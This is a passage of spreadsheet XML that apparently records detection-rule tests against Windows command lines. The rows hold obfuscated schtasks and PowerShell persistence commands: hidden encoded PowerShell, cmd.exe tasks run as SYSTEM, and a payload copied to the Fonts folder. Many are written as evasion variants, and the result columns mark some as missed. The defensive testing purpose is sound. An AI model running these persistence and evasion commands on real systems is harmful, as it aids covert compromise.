      <c r="D349" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E349" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CrEATe -"TN" "WinUpdateTask" /TR "powershell -nop -noNInteractIVE -ws Hidden -c \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F349" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G349" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H349" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I349" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J349" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K349" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="350" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A350" s="43" t="n"/>
      <c r="B350" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C350" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D350" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E350" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CREAtE /TN "WinUpdateTask" -"TR" "powershell -nOPrOfile -NonInteractive -WInDOWStYlE Hidden -COMMANd \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F350" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G350" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H350" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I350" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J350" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K350" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="351" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A351" s="43" t="n"/>
      <c r="B351" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C351" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D351" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E351" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" -"TN" "WinUpdateTask" /"TR" "powershell -NoPROfIlE /"NonInteractive" /"WindowStyle" Hidden -"Command" \" Write-Host 'Test' \"" -"SC" ONLOGON</t>
        </is>
      </c>
      <c r="F351" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G351" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H351" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I351" s="43" t="n"/>
      <c r="J351" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K351" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="352" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A352" s="43" t="n"/>
      <c r="B352" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_appdata_local_system</t>
        </is>
      </c>
      <c r="C352" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Execution AppData Folder</t>
        </is>
      </c>
      <c r="D352" s="36" t="inlineStr">
        <is>
          <t>c5c00f49-b3f9-45a6-997e-cfdecc6e1967</t>
        </is>
      </c>
      <c r="E352" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public\..\Admin\AppData\Local &amp;&amp; schtasks /Create /TN "UpdateTask" /TR "payload.exe" /SC ONSTART /RU SYSTEM"</t>
        </is>
      </c>
      <c r="F352" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G352" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H352" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I352" s="43" t="n"/>
      <c r="J352" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K352" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="353" ht="15.75" customHeight="1" s="42">
      <c r="A353" s="43" t="n"/>
      <c r="B353" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C353" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D353" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E353" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Register-ScheduledTask -TaskName 'SystemTask2' -Action (New-ScheduledTaskAction -Execute 'cmd.exe') -User 'NT AUTHORITY\SYSTEM'"</t>
        </is>
      </c>
      <c r="F353" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G353" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H353" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I353" s="43" t="n"/>
      <c r="J353" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K353" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="354" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A354" s="43" t="n"/>
      <c r="B354" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C354" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D354" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E354" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "SystemTask3" /tr "cmd.exe" /sc daily /ru SYSTEM</t>
        </is>
      </c>
      <c r="F354" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G354" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H354" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I354" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J354" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K354" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="355" ht="15.75" customHeight="1" s="42">
      <c r="A355" s="43" t="n"/>
      <c r="B355" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C355" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D355" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E355" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CREATE /"tn" "SystemTask3" /TR "cmd.exe" /sC daily /RU SYSTEM</t>
        </is>
      </c>
      <c r="F355" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G355" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H355" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I355" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J355" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K355" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="356" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A356" s="43" t="n"/>
      <c r="B356" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C356" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D356" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E356" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /TN "SystemTask3" -"tr" "cmd.exe" /sc daily /ru SYSTEM</t>
        </is>
      </c>
      <c r="F356" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G356" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H356" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I356" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J356" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K356" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="357" ht="15.75" customHeight="1" s="42">
      <c r="A357" s="43" t="n"/>
      <c r="B357" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C357" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D357" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E357" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /creaTe /tn "SystemTask3" /"tr" "cmd.exe" /sC daily /Ru SYSTEM</t>
        </is>
      </c>
      <c r="F357" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G357" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H357" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I357" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J357" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K357" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="358" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A358" s="36" t="n"/>
      <c r="B358" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C358" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D358" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E358" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"create" /tn "SystemTask3" /"tr" "cmd.exe" /sc daily /Ru SYSTEM</t>
        </is>
      </c>
      <c r="F358" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G358" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H358" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I358" s="43" t="n"/>
      <c r="J358" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K358" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="359" ht="15.75" customHeight="1" s="42">
      <c r="A359" s="36" t="n"/>
      <c r="B359" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C359" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D359" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E359" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CrEATE /Tn "SystemTask3" /"tr" "cmd.exe" /Sc daily /RU SYSTEM</t>
        </is>
      </c>
      <c r="F359" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G359" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H359" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I359" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J359" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K359" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="360" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A360" s="36" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B360" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C360" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D360" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E360" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" c^opy C:\temp\payload.bat C:\Windows\F^onts\</t>
        </is>
      </c>
      <c r="F360" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G360" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H360" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I360" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J360" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K360" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="361" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A361" s="43" t="n"/>
      <c r="B361" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C361" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D361" s="36" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E361" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "BypassTask" /TR "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand JABwAHkAcwB0AGUAbQAuAEQAYQB0AGEgAEMAbwBkAGUAKAAnAEMAbwBkAGUAnAApACAAIABzAHQAYQByAHQAIABwAHIAbwBjAGUAcwBzACAAJABzAHQAYQByAHQAIAAnAEMAbwBkAGUAnAApACAA" /SC MINUTE /MO 30</t>
        </is>
      </c>
      <c r="F361" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G361" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H361" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I361" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J361" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K361" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="362" ht="15.75" customHeight="1" s="42">
      <c r="A362" s="43" t="n"/>
      <c r="B362" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C362" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D362" s="36" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E362" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /creaTe /TN "BypassTask" /TR "powershell.exe -noPrOfile -wINDOwStYle Hidden /"EncodedCommand" JABwAHkAcwB0AGUAbQAuAEQAYQB0AGEgAEMAbwBkAGUAKAAnAEMAbwBkAGUAnAApACAAIABzAHQAYQByAHQAIABwAHIAbwBjAGUAcwBzACAAJABzAHQAYQByAHQAIAAnAEMAbwBkAGUAnAApACAA" /SC MINUTE /MO 30</t>
        </is>
      </c>
      <c r="F362" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G362" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H362" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I362" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J362" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K362" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="363" ht="15.75" customHeight="1" s="42">
      <c r="A363" s="43" t="n"/>
      <c r="B363" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C363" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D363" s="36" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E363" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /crEaTe -"TN" "BypassTask" /TR "powershell.exe /"NoProfile" -WiNDOwStyLE Hidden -EnCoDedCoMMAND JABwAHkAcwB0AGUAbQAuAEQAYQB0AGEgAEMAbwBkAGUAKAAnAEMAbwBkAGUAnAApACAAIABzAHQAYQByAHQAIABwAHIAbwBjAGUAcwBzACAAJABzAHQAYQByAHQAIAAnAEMAbwBkAGUAnAApACAA" /sC MINUTE /MO 30</t>
        </is>
      </c>
      <c r="F363" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G363" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H363" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I363" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J363" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K363" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="364" ht="15.75" customHeight="1" s="42">
      <c r="A364" s="43" t="n"/>
      <c r="B364" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C364" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D364" s="36" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E364" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "BypassTask" -"TR" "powershell.exe -"NoProfile" /"WindowStyle" Hidden -enCodEDcoMMANd JABwAHkAcwB0AGUAbQAuAEQAYQB0AGEgAEMAbwBkAGUAKAAnAEMAbwBkAGUAnAApACAAIABzAHQAYQByAHQAIABwAHIAbwBjAGUAcwBzACAAJABzAHQAYQByAHQAIAAnAEMAbwBkAGUAnAApACAA" -"SC" MINUTE /"MO" 30</t>
        </is>
      </c>
      <c r="F364" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G364" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H364" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I364" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J364" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K364" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="365" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A365" s="43" t="n"/>
      <c r="B365" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C365" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D365" s="36" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E365" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /"TN" "BypassTask" /TR "powershell.exe /"NoProfile" -ws Hidden -ENcodEdCommAnD JABwAHkAcwB0AGUAbQAuAEQAYQB0AGEgAEMAbwBkAGUAKAAnAEMAbwBkAGUAnAApACAAIABzAHQAYQByAHQAIABwAHIAbwBjAGUAcwBzACAAJABzAHQAYQByAHQAIAAnAEMAbwBkAGUAnAApACAA" /sc MINUTE /MO 30</t>
        </is>
      </c>
      <c r="F365" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G365" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H365" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I365" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J365" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K365" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="366" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A366" s="43" t="n"/>
      <c r="B366" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C366" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D366" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E366" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CReatE -"TN" EvilTask /TR "C:\Windows\System32\calc.exe" /sc WEEKLY -"D" MON -"ST" 08:00</t>
        </is>
      </c>
      <c r="F366" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G366" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H366" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I366" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J366" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K366" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="367" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A367" s="43" t="n"/>
      <c r="B367" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C367" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D367" s="36" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E367" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CrEAte /TN "BypassTask" /tr "powershell.exe -nOpROfIlE -"WindowStyle" Hidden -"EncodedCommand" JABwAHkAcwB0AGUAbQAuAEQAYQB0AGEgAEMAbwBkAGUAKAAnAEMAbwBkAGUAnAApACAAIABzAHQAYQByAHQAIABwAHIAbwBjAGUAcwBzACAAJABzAHQAYQByAHQAIAAnAEMAbwBkAGUAnAApACAA" /sC MINUTE /MO 30</t>
        </is>
      </c>
      <c r="F367" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G367" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H367" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I367" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J367" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K367" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="368" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A368" s="43" t="n"/>
      <c r="B368" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C368" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D368" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E368" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /cReatE /TN EvilTask /TR "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON -"ST" 08:00</t>
        </is>
      </c>
      <c r="F368" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G368" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H368" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I368" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J368" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K368" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="369" ht="15.75" customHeight="1" s="42">
      <c r="A369" s="43" t="n"/>
      <c r="B369" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C369" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D369" s="36" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E369" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /Tn "BypassTask" /"TR" "powershell.exe -nop -winDOwStYLE Hidden -enc JABwAHkAcwB0AGUAbQAuAEQAYQB0AGEgAEMAbwBkAGUAKAAnAEMAbwBkAGUAnAApACAAIABzAHQAYQByAHQAIABwAHIAbwBjAGUAcwBzACAAJABzAHQAYQByAHQAIAAnAEMAbwBkAGUAnAApACAA" /SC MINUTE /"MO" 30</t>
        </is>
      </c>
      <c r="F369" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G369" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H369" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I369" s="36" t="n"/>
      <c r="J369" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K369" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="370" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A370" s="43" t="n"/>
      <c r="B370" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C370" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D370" s="36" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E370" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "BypassTask" -"TR" "powershell.exe -nop -WInDoWStYlE Hidden /"EncodedCommand" JABwAHkAcwB0AGUAbQAuAEQAYQB0AGEgAEMAbwBkAGUAKAAnAEMAbwBkAGUAnAApACAAIABzAHQAYQByAHQAIABwAHIAbwBjAGUAcwBzACAAJABzAHQAYQByAHQAIAAnAEMAbwBkAGUAnAApACAA" /SC MINUTE /MO 30</t>
        </is>
      </c>
      <c r="F370" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G370" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H370" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I370" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J370" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K370" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="371" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A371" s="43" t="n"/>
      <c r="B371" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C371" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D371" s="36" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E371" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /"TN" "BypassTask" /tr "powershell.exe -nop -windoWsTYle Hidden -enc JABwAHkAcwB0AGUAbQAuAEQAYQB0AGEgAEMAbwBkAGUAKAAnAEMAbwBkAGUAnAApACAAIABzAHQAYQByAHQAIABwAHIAbwBjAGUAcwBzACAAJABzAHQAYQByAHQAIAAnAEMAbwBkAGUAnAApACAA" /"SC" MINUTE /MO 30</t>
        </is>
      </c>
      <c r="F371" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G371" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H371" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I371" s="36" t="n"/>
      <c r="J371" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K371" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="372" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A372" s="43" t="n"/>
      <c r="B372" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C372" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D372" s="36" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E372" s="36" t="inlineStr">
        <is>
